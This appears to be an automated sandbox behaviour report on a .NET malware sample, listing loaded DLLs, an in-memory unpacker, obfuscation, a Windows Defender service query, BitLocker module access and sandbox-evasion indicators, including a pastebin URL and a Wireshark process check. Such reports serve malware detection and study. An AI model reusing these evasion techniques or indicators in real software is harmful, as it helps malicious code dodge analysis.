Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: security.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: G1lnGpOLK4.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe File opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_88e266cb2fac7c0d\MSVCR80.dll Jump to behavior
Source: G1lnGpOLK4.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: G1lnGpOLK4.exe, _.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, OK.cs .Net Code: Plugin System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Code function: 0_2_00007FFD9B8E1443 push ebx; ret 0_2_00007FFD9B8E15EA
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Code function: 0_2_00007FFD9B8E2354 push ecx; retf 485Fh 0_2_00007FFD9B8E3186
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Code function: 0_2_00007FFD9B8E1EDA push ecx; retf 485Fh 0_2_00007FFD9B8E3186
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc query windefend

Hooking and other Techniques for Hiding and Protection
barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: WIRESHARK.EXECHTTPS://PASTEBIN.COM/RAW/S4TIPMJTNULL
Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Memory allocated: EA0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Memory allocated: 30A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe Memory allocated: 1B0A0000 memory commit | memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
